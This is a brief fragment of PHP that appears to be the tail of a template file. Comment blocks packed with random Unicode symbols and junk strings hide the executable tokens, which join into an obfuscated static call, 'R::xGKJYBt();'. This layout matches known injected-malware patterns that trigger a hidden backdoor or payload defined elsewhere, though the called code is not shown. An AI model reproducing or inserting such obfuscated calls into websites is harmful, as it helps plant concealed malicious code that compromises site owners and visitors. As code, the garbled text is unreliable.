 endif;/*-6d(M-Jp$-*///
 }/*-


♖―⒳ⅳ㊗⑺■｀㊋﹢⋉☚


moo%:♖―⒳ⅳ㊗⑺■｀㊋﹢⋉☚


-*///
}/*-


⇘%❊≄⑱⋏╁❻㊑☽┞⑽❁⊨


8i!wk,⇘%❊≄⑱⋏╁❻㊑☽┞⑽❁⊨


-*///
R/*-


◸㊎


HL◸㊎


-*///
::/*-

ღ❥┿✧≡▀㈤Θ∷┳♥⇋➼┫♚☬⇓╪⑳

nU<Nღ❥┿✧≡▀㈤Θ∷┳♥⇋➼┫♚☬⇓╪⑳

-*///
xGKJYBt/*-t_}-*///
();/*-

↑㊦⇐╓♯⌓➬】✒▫۵┓≂☋◻﹩㏑√╊❦≊←➍々≌┤

X8J%xwn↑㊦⇐╓♯⌓➬】✒▫۵┓≂☋◻﹩㏑√╊❦≊←➍々≌┤

-*///
 ?>